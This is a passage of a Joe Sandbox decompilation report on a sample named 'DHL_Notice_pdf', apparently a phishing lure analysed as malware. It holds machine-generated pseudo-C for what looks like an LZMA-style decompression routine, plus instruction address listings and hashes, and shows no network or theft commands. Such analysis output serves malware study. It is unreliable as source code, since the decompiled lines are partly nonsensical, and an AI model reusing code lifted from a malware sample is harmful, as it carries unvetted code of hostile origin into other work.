                                                            											if( *(__ebp - 0x40) != 0) {
                                                            												_t469 = __ebp - 0x58;
                                                            												 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                            												__eflags =  *_t469;
                                                            												 *(__ebp - 0x30) = 0x10;
                                                            												 *(__ebp - 0x40) = 8;
                                                            												goto L144;
                                                            											}
                                                            											__eax =  *(__ebp - 0x4c);
                                                            											__ecx =  *(__ebp - 0x58);
                                                            											__eax =  *(__ebp - 0x4c) << 4;
                                                            											 *(__ebp - 0x30) = 8;
                                                            											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                            											goto L130;
                                                            										case 0x14:
                                                            											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                            											__eax =  *(__ebp - 0x80);
                                                            											L140:
                                                            											 *(_t612 - 0x88) = _t533;
                                                            											goto L1;
                                                            										case 0x15:
                                                            											__eax = 0;
                                                            											__eflags =  *(__ebp - 0x38) - 7;
                                                            											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                            											__al = __al & 0x000000fd;
                                                            											__eax = (__eflags >= 0) - 1 + 0xb;
                                                            											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                            											goto L121;
                                                            										case 0x16:
                                                            											__eax =  *(__ebp - 0x30);
                                                            											__eflags = __eax - 4;
                                                            											if(__eax >= 4) {
                                                            												_push(3);
                                                            												_pop(__eax);
                                                            											}
                                                            											__ecx =  *(__ebp - 4);
                                                            											 *(__ebp - 0x40) = 6;
                                                            											__eax = __eax << 7;
                                                            											 *(__ebp - 0x7c) = 0x19;
                                                            											 *(__ebp - 0x58) = __eax;
                                                            											goto L145;
                                                            										case 0x17:
                                                            											goto L145;
                                                            										case 0x18:
                                                            											L146:
                                                            											__eflags =  *(__ebp - 0x6c);
                                                            											if( *(__ebp - 0x6c) == 0) {
                                                            												 *(__ebp - 0x88) = 0x18;
                                                            												goto L170;
                                                            											}
                                                            											__ecx =  *(__ebp - 0x70);
                                                            											__eax =  *(__ebp - 0xc);
                                                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                            											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                            											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            											_t484 = __ebp - 0x70;
                                                            											 *_t484 =  *(__ebp - 0x70) + 1;
                                                            											__eflags =  *_t484;
                                                            											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            											L148:
                                                            											_t487 = __ebp - 0x48;
                                                            											 *_t487 =  *(__ebp - 0x48) - 1;
                                                            											__eflags =  *_t487;
                                                            											goto L149;
                                                            										case 0x19:
                                                            											__eflags = __ebx - 4;
                                                            											if(__ebx < 4) {
                                                            												 *(__ebp - 0x2c) = __ebx;
                                                            												L120:
                                                            												_t394 = __ebp - 0x2c;
                                                            												 *_t394 =  *(__ebp - 0x2c) + 1;
                                                            												__eflags =  *_t394;
                                                            												L121:
                                                            												__eax =  *(__ebp - 0x2c);
                                                            												__eflags = __eax;
                                                            												if(__eax == 0) {
                                                            													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                            													goto L170;
                                                            												}
                                                            												__eflags = __eax -  *(__ebp - 0x60);
                                                            												if(__eax >  *(__ebp - 0x60)) {
                                                            													goto L171;
                                                            												}
                                                            												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                            												__eax =  *(__ebp - 0x30);
                                                            												_t401 = __ebp - 0x60;
                                                            												 *_t401 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                            												__eflags =  *_t401;
                                                            												goto L124;
                                                            											}
                                                            											__ecx = __ebx;
                                                            											__eax = __ebx;
                                                            											__ecx = __ebx >> 1;
                                                            											__eax = __ebx & 0x00000001;
                                                            											__ecx = (__ebx >> 1) - 1;
                                                            											__al = __al | 0x00000002;
                                                            											__eax = (__ebx & 0x00000001) << __cl;
                                                            											__eflags = __ebx - 0xe;
                                                            											 *(__ebp - 0x2c) = __eax;
                                                            											if(__ebx >= 0xe) {
                                                            												__ebx = 0;
                                                            												 *(__ebp - 0x48) = __ecx;
                                                            												L103:
                                                            												__eflags =  *(__ebp - 0x48);
                                                            												if( *(__ebp - 0x48) <= 0) {
                                                            													__eax = __eax + __ebx;
                                                            													 *(__ebp - 0x40) = 4;
                                                            													 *(__ebp - 0x2c) = __eax;
                                                            													__eax =  *(__ebp - 4);
                                                            													__eax =  *(__ebp - 4) + 0x644;
                                                            													__eflags = __eax;
                                                            													L109:
                                                            													__ebx = 0;
                                                            													 *(__ebp - 0x58) = __eax;
                                                            													 *(__ebp - 0x50) = 1;
                                                            													 *(__ebp - 0x44) = 0;
                                                            													 *(__ebp - 0x48) = 0;
                                                            													L113:
                                                            													__eax =  *(__ebp - 0x40);
                                                            													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                            													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                                            														_t392 = __ebp - 0x2c;
                                                            														 *_t392 =  *(__ebp - 0x2c) + __ebx;
                                                            														__eflags =  *_t392;
                                                            														goto L120;
                                                            													}
                                                            													__eax =  *(__ebp - 0x50);
                                                            													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                            													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                            													__eax =  *(__ebp - 0x58);
                                                            													__esi = __edi + __eax;
                                                            													 *(__ebp - 0x54) = __esi;
                                                            													__ax =  *__esi;
                                                            													__ecx = __ax & 0x0000ffff;
                                                            													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                                            													__eflags =  *(__ebp - 0xc) - __edx;
                                                            													if( *(__ebp - 0xc) >= __edx) {
                                                            														__ecx = 0;
                                                            														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                                            														__ecx = 1;
                                                            														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                                            														__ebx = 1;
                                                            														__ecx =  *(__ebp - 0x48);
                                                            														__ebx = 1 << __cl;
                                                            														__ecx = 1 << __cl;
                                                            														__ebx =  *(__ebp - 0x44);
                                                            														__ebx =  *(__ebp - 0x44) | __ecx;
                                                            														__cx = __ax;
                                                            														__cx = __ax >> 5;
                                                            														__eax = __eax - __ecx;
                                                            														__edi = __edi + 1;
                                                            														__eflags = __edi;
                                                            														 *(__ebp - 0x44) = __ebx;
                                                            														 *__esi = __ax;
                                                            														 *(__ebp - 0x50) = __edi;
                                                            													} else {
                                                            														 *(__ebp - 0x10) = __edx;
                                                            														0x800 = 0x800 - __ecx;
                                                            														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                            														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                            														 *__esi = __dx;
                                                            													}
                                                            													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                            													if( *(__ebp - 0x10) >= 0x1000000) {
                                                            														L112:
                                                            														_t369 = __ebp - 0x48;
                                                            														 *_t369 =  *(__ebp - 0x48) + 1;
                                                            														__eflags =  *_t369;
                                                            														goto L113;
                                                            													} else {
                                                            														goto L110;
                                                            													}
                                                            												}
                                                            												__ecx =  *(__ebp - 0xc);
                                                            												__ebx = __ebx + __ebx;
                                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                                            												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                            												 *(__ebp - 0x44) = __ebx;
                                                            												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                                            													__ecx =  *(__ebp - 0x10);
                                                            													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                            													__ebx = __ebx | 0x00000001;
                                                            													__eflags = __ebx;
                                                            													 *(__ebp - 0x44) = __ebx;
                                                            												}
                                                            												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                            												if( *(__ebp - 0x10) >= 0x1000000) {
                                                            													L102:
                                                            													_t339 = __ebp - 0x48;
                                                            													 *_t339 =  *(__ebp - 0x48) - 1;
                                                            													__eflags =  *_t339;
                                                            													goto L103;
                                                            												} else {
                                                            													goto L100;
                                                            												}
                                                            											}
                                                            											__edx =  *(__ebp - 4);
                                                            											__eax = __eax - __ebx;
                                                            											 *(__ebp - 0x40) = __ecx;
                                                            											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                                            											goto L109;
                                                            										case 0x1a:
                                                            											L56:
                                                            											__eflags =  *(__ebp - 0x64);
                                                            											if( *(__ebp - 0x64) == 0) {
                                                            												 *(__ebp - 0x88) = 0x1a;
                                                            												goto L170;
                                                            											}
                                                            											__ecx =  *(__ebp - 0x68);
                                                            											__al =  *(__ebp - 0x5c);
                                                            											__edx =  *(__ebp - 8);
                                                            											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                            											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                            											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                            											 *( *(__ebp - 0x68)) = __al;
                                                            											__ecx =  *(__ebp - 0x14);
                                                            											 *(__ecx +  *(__ebp - 8)) = __al;
                                                            											__eax = __ecx + 1;
                                                            											__edx = 0;
                                                            											_t192 = __eax %  *(__ebp - 0x74);
                                                            											__eax = __eax /  *(__ebp - 0x74);
                                                            											__edx = _t192;
                                                            											goto L80;
                                                            										case 0x1b:
                                                            											L76:
                                                            											__eflags =  *(__ebp - 0x64);
                                                            											if( *(__ebp - 0x64) == 0) {
                                                            												 *(__ebp - 0x88) = 0x1b;
                                                            												goto L170;
                                                            											}
                                                            											__eax =  *(__ebp - 0x14);
                                                            											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                            											__eflags = __eax -  *(__ebp - 0x74);
                                                            											if(__eax >=  *(__ebp - 0x74)) {
                                                            												__eax = __eax +  *(__ebp - 0x74);
                                                            												__eflags = __eax;
                                                            											}
                                                            											__edx =  *(__ebp - 8);
                                                            											__cl =  *(__eax + __edx);
                                                            											__eax =  *(__ebp - 0x14);
                                                            											 *(__ebp - 0x5c) = __cl;
                                                            											 *(__eax + __edx) = __cl;
                                                            											__eax = __eax + 1;
                                                            											__edx = 0;
                                                            											_t275 = __eax %  *(__ebp - 0x74);
                                                            											__eax = __eax /  *(__ebp - 0x74);
                                                            											__edx = _t275;
                                                            											__eax =  *(__ebp - 0x68);
                                                            											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                            											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                            											_t284 = __ebp - 0x64;
                                                            											 *_t284 =  *(__ebp - 0x64) - 1;
                                                            											__eflags =  *_t284;
                                                            											 *( *(__ebp - 0x68)) = __cl;
                                                            											L80:
                                                            											 *(__ebp - 0x14) = __edx;
                                                            											goto L81;
                                                            										case 0x1c:
                                                            											while(1) {
                                                            												L124:
                                                            												__eflags =  *(__ebp - 0x64);
                                                            												if( *(__ebp - 0x64) == 0) {
                                                            													break;
                                                            												}
                                                            												__eax =  *(__ebp - 0x14);
                                                            												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                            												__eflags = __eax -  *(__ebp - 0x74);
                                                            												if(__eax >=  *(__ebp - 0x74)) {
                                                            													__eax = __eax +  *(__ebp - 0x74);
                                                            													__eflags = __eax;
                                                            												}
                                                            												__edx =  *(__ebp - 8);
                                                            												__cl =  *(__eax + __edx);
                                                            												__eax =  *(__ebp - 0x14);
                                                            												 *(__ebp - 0x5c) = __cl;
                                                            												 *(__eax + __edx) = __cl;
                                                            												__eax = __eax + 1;
                                                            												__edx = 0;
                                                            												_t415 = __eax %  *(__ebp - 0x74);
                                                            												__eax = __eax /  *(__ebp - 0x74);
                                                            												__edx = _t415;
                                                            												__eax =  *(__ebp - 0x68);
                                                            												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                            												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                            												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                                            												__eflags =  *(__ebp - 0x30);
                                                            												 *( *(__ebp - 0x68)) = __cl;
                                                            												 *(__ebp - 0x14) = _t415;
                                                            												if( *(__ebp - 0x30) > 0) {
                                                            													continue;
                                                            												} else {
                                                            													L81:
                                                            													 *(__ebp - 0x88) = 2;
                                                            													goto L1;
                                                            												}
                                                            											}
                                                            											 *(__ebp - 0x88) = 0x1c;
                                                            											L170:
                                                            											_push(0x22);
                                                            											_pop(_t567);
                                                            											memcpy( *(_t612 - 0x90), _t612 - 0x88, _t567 << 2);
                                                            											_t535 = 0;
                                                            											L172:
                                                            											return _t535;
                                                            									}
                                                            								}
                                                            								L171:
                                                            								_t535 = _t534 | 0xffffffff;
                                                            								goto L172;
                                                            							}
                                                            						}
                                                            						__eax =  *(__ebp - 0x50);
                                                            						 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                            						__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                            						__eax =  *(__ebp - 0x58);
                                                            						__esi = __edx + __eax;
                                                            						 *(__ebp - 0x54) = __esi;
                                                            						__ax =  *__esi;
                                                            						__edi = __ax & 0x0000ffff;
                                                            						__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                            						if( *(__ebp - 0xc) >= __ecx) {
                                                            							 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                            							 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                            							__cx = __ax;
                                                            							__cx = __ax >> 5;
                                                            							__eax = __eax - __ecx;
                                                            							__edx = __edx + 1;
                                                            							 *__esi = __ax;
                                                            							 *(__ebp - 0x50) = __edx;
                                                            						} else {
                                                            							 *(__ebp - 0x10) = __ecx;
                                                            							0x800 = 0x800 - __edi;
                                                            							0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                            							 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                            							 *__esi = __cx;
                                                            						}
                                                            						if( *(__ebp - 0x10) >= 0x1000000) {
                                                            							goto L148;
                                                            						} else {
                                                            							goto L146;
                                                            						}
                                                            					}
                                                            					goto L1;
                                                            				}
                                                            			}








                                                            0x004070cc
                                                            0x00000000
                                                            0x00000000
                                                            0x0040711c
                                                            0x00407120
                                                            0x00407127
                                                            0x0040712a
                                                            0x0040712d
                                                            0x00407137
                                                            0x00000000
                                                            0x00407137
                                                            0x00407122
                                                            0x00000000
                                                            0x00000000
                                                            0x00407143
                                                            0x00407147
                                                            0x0040714e
                                                            0x00407151
                                                            0x00407154
                                                            0x00407149
                                                            0x00407149
                                                            0x00407149
                                                            0x00407157
                                                            0x0040715a
                                                            0x0040715d
                                                            0x0040715d
                                                            0x00407160
                                                            0x00407163
                                                            0x00407166
                                                            0x00407166
                                                            0x00407169
                                                            0x00407170
                                                            0x00407175
                                                            0x00000000
                                                            0x00000000
                                                            0x00407203
                                                            0x00407203
                                                            0x00407207
                                                            0x004075a5
                                                            0x00000000
                                                            0x004075a5
                                                            0x0040720d
                                                            0x00407210
                                                            0x00407213
                                                            0x00407217
                                                            0x0040721a
                                                            0x00407220
                                                            0x00407222
                                                            0x00407222
                                                            0x00407222
                                                            0x00407225
                                                            0x00407228
                                                            0x00000000
                                                            0x00000000
                                                            0x00406df8
                                                            0x00406df8
                                                            0x00406dfc
                                                            0x00407569
                                                            0x00000000
                                                            0x00407569
                                                            0x00406e02
                                                            0x00406e05
                                                            0x00406e08
                                                            0x00406e0c
                                                            0x00406e0f
                                                            0x00406e15
                                                            0x00406e17
                                                            0x00406e17
                                                            0x00406e17
                                                            0x00406e1a
                                                            0x00406e1d
                                                            0x00406e1d
                                                            0x00406e20
                                                            0x00406e23
                                                            0x00000000
                                                            0x00000000
                                                            0x00406e29
                                                            0x00406e2f
                                                            0x00000000
                                                            0x00000000
                                                            0x00406e35
                                                            0x00406e35
                                                            0x00406e39
                                                            0x00406e3c
                                                            0x00406e3f
                                                            0x00406e42
                                                            0x00406e45
                                                            0x00406e46
                                                            0x00406e49
                                                            0x00406e4b
                                                            0x00406e51
                                                            0x00406e54
                                                            0x00406e57
                                                            0x00406e5a
                                                            0x00406e5d
                                                            0x00406e60
                                                            0x00406e63
                                                            0x00406e7f
                                                            0x00406e82
                                                            0x00406e85
                                                            0x00406e88
                                                            0x00406e8f
                                                            0x00406e93
                                                            0x00406e95
                                                            0x00406e99
                                                            0x00406e65
                                                            0x00406e65
                                                            0x00406e69
                                                            0x00406e71
                                                            0x00406e76
                                                            0x00406e78
                                                            0x00406e7a
                                                            0x00406e7a
                                                            0x00406e9c
                                                            0x00406ea3
                                                            0x00406ea6
                                                            0x00000000
                                                            0x00406eac
                                                            0x00000000
                                                            0x00406eac
                                                            0x00000000
                                                            0x00406eb1
                                                            0x00406eb1
                                                            0x00406eb5
                                                            0x00407575
                                                            0x00000000
                                                            0x00407575
                                                            0x00406ebb
                                                            0x00406ebe
                                                            0x00406ec1
                                                            0x00406ec5
                                                            0x00406ec8
                                                            0x00406ece
                                                            0x00406ed0
                                                            0x00406ed0
                                                            0x00406ed0
                                                            0x00406ed3
                                                            0x00406ed6
                                                            0x00406ed6
                                                            0x00406ed6
                                                            0x00406edc
                                                            0x00000000
                                                            0x00000000
                                                            0x00406ede
                                                            0x00406ee1
                                                            0x00406ee4
                                                            0x00406ee7
                                                            0x00406eea
                                                            0x00406eed
                                                            0x00406ef0
                                                            0x00406ef3
                                                            0x00406ef6
                                                            0x00406ef9
                                                            0x00406efc
                                                            0x00406f14
                                                            0x00406f17
                                                            0x00406f1a
                                                            0x00406f1d
                                                            0x00406f1d
                                                            0x00406f20
                                                            0x00406f24
                                                            0x00406f26
                                                            0x00406efe
                                                            0x00406efe
                                                            0x00406f06
                                                            0x00406f0b
                                                            0x00406f0d
                                                            0x00406f0f
                                                            0x00406f0f
                                                            0x00406f29
                                                            0x00406f30
                                                            0x00406f33
                                                            0x00000000
                                                            0x00406f35
                                                            0x00000000
                                                            0x00406f35
                                                            0x00406f33
                                                            0x00406f3a
                                                            0x00406f3a
                                                            0x00406f3a
                                                            0x00406f3a
                                                            0x00000000
                                                            0x00000000
                                                            0x00406f75
                                                            0x00406f75
                                                            0x00406f79
                                                            0x00407581
                                                            0x00000000
                                                            0x00407581
                                                            0x00406f7f
                                                            0x00406f82
                                                            0x00406f85
                                                            0x00406f89
                                                            0x00406f8c
                                                            0x00406f92
                                                            0x00406f94
                                                            0x00406f94
                                                            0x00406f94
                                                            0x00406f97
                                                            0x00406f9a
                                                            0x00406f9a
                                                            0x00406fa0
                                                            0x00406f3e
                                                            0x00406f3e
                                                            0x00406f41
                                                            0x00000000
                                                            0x00406f41
                                                            0x00406fa2
                                                            0x00406fa2
                                                            0x00406fa5
                                                            0x00406fa8
                                                            0x00406fab
                                                            0x00406fae
                                                            0x00406fb1
                                                            0x00406fb4
                                                            0x00406fb7
                                                            0x00406fba
                                                            0x00406fbd
                                                            0x00406fc0
                                                            0x00406fd8
                                                            0x00406fdb
                                                            0x00406fde
                                                            0x00406fe1
                                                            0x00406fe1
                                                            0x00406fe4
                                                            0x00406fe8
                                                            0x00406fea
                                                            0x00406fc2
                                                            0x00406fc2
                                                            0x00406fca
                                                            0x00406fcf
                                                            0x00406fd1
                                                            0x00406fd3
                                                            0x00406fd3
                                                            0x00406fed
                                                            0x00406ff4
                                                            0x00406ff7
                                                            0x00000000
                                                            0x00406ff9
                                                            0x00000000
                                                            0x00406ff9
                                                            0x00000000
                                                            0x00407286
                                                            0x00407286
                                                            0x0040728a
                                                            0x004075b1
                                                            0x00000000
                                                            0x004075b1
                                                            0x00407290
                                                            0x00407293
                                                            0x00407296
                                                            0x0040729a
                                                            0x0040729d
                                                            0x004072a3
                                                            0x004072a5
                                                            0x004072a5
                                                            0x004072a5
                                                            0x004072a8
                                                            0x00000000
                                                            0x00000000
                                                            0x00407056
                                                            0x00407056
                                                            0x00407059
                                                            0x004073cb
                                                            0x004073cb
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00407452
                                                            0x00407456
                                                            0x00407474
                                                            0x00407474
                                                            0x00407474
                                                            0x0040747b
                                                            0x00407482
                                                            0x00000000
                                                            0x00407482
                                                            0x00407458
                                                            0x0040745b
                                                            0x0040745e
                                                            0x00407461
                                                            0x00407468
                                                            0x00000000
                                                            0x00000000
                                                            0x00407543
                                                            0x00407546
                                                            0x00407447
                                                            0x00407447
                                                            0x00000000
                                                            0x00000000
                                                            0x0040717d
                                                            0x0040717f
                                                            0x00407186
                                                            0x00407187
                                                            0x00407189
                                                            0x0040718c
                                                            0x00000000
                                                            0x00000000
                                                            0x00407194
                                                            0x00407197
                                                            0x0040719a
                                                            0x0040719c
                                                            0x0040719e
                                                            0x0040719e
                                                            0x0040719f
                                                            0x004071a2
                                                            0x004071a9
                                                            0x004071ac
                                                            0x004071ba
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x0040749f
                                                            0x0040749f
                                                            0x004074a3
                                                            0x004075db
                                                            0x00000000
                                                            0x004075db
                                                            0x004074a9
                                                            0x004074ac
                                                            0x004074af
                                                            0x004074b3
                                                            0x004074b6
                                                            0x004074bc
                                                            0x004074be
                                                            0x004074be
                                                            0x004074be
                                                            0x004074c1
                                                            0x004074c4
                                                            0x004074c4
                                                            0x004074c4
                                                            0x004074c4
                                                            0x00000000
                                                            0x00000000
                                                            0x004071c2
                                                            0x004071c5
                                                            0x004071fb
                                                            0x0040732b
                                                            0x0040732b
                                                            0x0040732b
                                                            0x0040732b
                                                            0x0040732e
                                                            0x0040732e
                                                            0x00407331
                                                            0x00407333
                                                            0x004075bd
                                                            0x00000000
                                                            0x004075bd
                                                            0x00407339
                                                            0x0040733c
                                                            0x00000000
                                                            0x00000000
                                                            0x00407342
                                                            0x00407346
                                                            0x00407349
                                                            0x00407349
                                                            0x00407349
                                                            0x00000000
                                                            0x00407349
                                                            0x004071c7
                                                            0x004071c9
                                                            0x004071cb
                                                            0x004071cd
                                                            0x004071d0
                                                            0x004071d1
                                                            0x004071d3
                                                            0x004071d5
                                                            0x004071d8
                                                            0x004071db
                                                            0x004071f1
                                                            0x004071f6
                                                            0x0040722e
                                                            0x0040722e
                                                            0x00407232
                                                            0x0040725e
                                                            0x00407260
                                                            0x00407267
                                                            0x0040726a
                                                            0x0040726d
                                                            0x0040726d
                                                            0x00407272
                                                            0x00407272
                                                            0x00407274
                                                            0x00407277
                                                            0x0040727e
                                                            0x00407281
                                                            0x004072ae
                                                            0x004072ae
                                                            0x004072b1
                                                            0x004072b4
                                                            0x00407328
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.248820039.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.248815920.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248830182.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248873061.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL_Notice_pdf.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 97748a737734167d5846b9d8dd4738ada3f75d0b833fdafa89234df63502b4a5
                                                            • Instruction ID: d49815ad38d406b3cd0a1a90ea7be1526168d9e39684835ffa6a026ef1ef4849
                                                            • Opcode Fuzzy Hash: 97748a737734167d5846b9d8dd4738ada3f75d0b833fdafa89234df63502b4a5
                                                            • Instruction Fuzzy Hash: 91913270D04228DBEF28CF98C8547ADBBB1FF44305F14816AD856BB281D778A986DF45
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 98%
                                                            			E004070AB() {
                                                            				unsigned short _t532;
                                                            				signed int _t533;
                                                            				void _t534;
                                                            				void* _t535;
                                                            				signed int _t536;
                                                            				signed int _t565;
                                                            				signed int _t568;
                                                            				signed int _t589;
                                                            				signed int* _t606;
                                                            				void* _t613;
                                                            
                                                            				L0:
                                                            				while(1) {
                                                            					L0:
                                                            					if( *(_t613 - 0x40) != 0) {
                                                            						L89:
                                                            						 *((intOrPtr*)(_t613 - 0x80)) = 0x15;
                                                            						 *(_t613 - 0x58) =  *(_t613 - 4) + 0xa68;
                                                            						L69:
                                                            						_t606 =  *(_t613 - 0x58);
                                                            						 *(_t613 - 0x84) = 0x12;
                                                            						L132:
                                                            						 *(_t613 - 0x54) = _t606;
                                                            						L133:
                                                            						_t532 =  *_t606;
                                                            						_t589 = _t532 & 0x0000ffff;
                                                            						_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                                            						if( *(_t613 - 0xc) >= _t565) {
                                                            							 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                                            							 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                                            							 *(_t613 - 0x40) = 1;
                                                            							_t533 = _t532 - (_t532 >> 5);
                                                            							 *_t606 = _t533;
                                                            						} else {
                                                            							 *(_t613 - 0x10) = _t565;
                                                            							 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                            							 *_t606 = (0x800 - _t589 >> 5) + _t532;
                                                            						}
                                                            						if( *(_t613 - 0x10) >= 0x1000000) {
                                                            							L139:
                                                            							_t534 =  *(_t613 - 0x84);
                                                            							L140:
                                                            							 *(_t613 - 0x88) = _t534;
                                                            							goto L1;
                                                            						} else {
                                                            							L137:
                                                            							if( *(_t613 - 0x6c) == 0) {
                                                            								 *(_t613 - 0x88) = 5;
                                                            								goto L170;
                                                            							}
                                                            							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
                                                            							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                            							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                            							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                            							goto L139;
                                                            						}
                                                            					} else {
                                                            						if( *(__ebp - 0x60) == 0) {
                                                            							L171:
                                                            							_t536 = _t535 | 0xffffffff;
                                                            							L172:
                                                            							return _t536;
                                                            						}
                                                            						__eax = 0;
                                                            						_t258 =  *(__ebp - 0x38) - 7 >= 0;
                                                            						0 | _t258 = _t258 + _t258 + 9;
                                                            						 *(__ebp - 0x38) = _t258 + _t258 + 9;
                                                            						L75:
                                                            						if( *(__ebp - 0x64) == 0) {
                                                            							 *(__ebp - 0x88) = 0x1b;
                                                            							L170:
                                                            							_t568 = 0x22;
                                                            							memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
                                                            							_t536 = 0;
                                                            							goto L172;
                                                            						}
                                                            						__eax =  *(__ebp - 0x14);
                                                            						__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                            						if(__eax >=  *(__ebp - 0x74)) {
                                                            							__eax = __eax +  *(__ebp - 0x74);
                                                            						}
                                                            						__edx =  *(__ebp - 8);
                                                            						__cl =  *(__eax + __edx);
                                                            						__eax =  *(__ebp - 0x14);
                                                            						 *(__ebp - 0x5c) = __cl;
                                                            						 *(__eax + __edx) = __cl;
                                                            						__eax = __eax + 1;
                                                            						__edx = 0;
                                                            						_t274 = __eax %  *(__ebp - 0x74);
                                                            						__eax = __eax /  *(__ebp - 0x74);
                                                            						__edx = _t274;
                                                            						__eax =  *(__ebp - 0x68);
                                                            						 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                            						 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                            						_t283 = __ebp - 0x64;
                                                            						 *_t283 =  *(__ebp - 0x64) - 1;
                                                            						 *( *(__ebp - 0x68)) = __cl;
                                                            						L79:
                                                            						 *(__ebp - 0x14) = __edx;
                                                            						L80:
                                                            						 *(__ebp - 0x88) = 2;
                                                            					}
                                                            					L1:
                                                            					_t535 =  *(_t613 - 0x88);
                                                            					if(_t535 > 0x1c) {
                                                            						goto L171;
                                                            					}
                                                            					switch( *((intOrPtr*)(_t535 * 4 +  &M00407602))) {
                                                            						case 0:
                                                            							if( *(_t613 - 0x6c) == 0) {
                                                            								goto L170;
                                                            							}
                                                            							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                            							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                            							_t535 =  *( *(_t613 - 0x70));
                                                            							if(_t535 > 0xe1) {
                                                            								goto L171;
                                                            							}
                                                            							_t539 = _t535 & 0x000000ff;
                                                            							_push(0x2d);
                                                            							asm("cdq");
                                                            							_pop(_t570);
                                                            							_push(9);
                                                            							_pop(_t571);
                                                            							_t609 = _t539 / _t570;
                                                            							_t541 = _t539 % _t570 & 0x000000ff;
                                                            							asm("cdq");
                                                            							_t604 = _t541 % _t571 & 0x000000ff;
                                                            							 *(_t613 - 0x3c) = _t604;
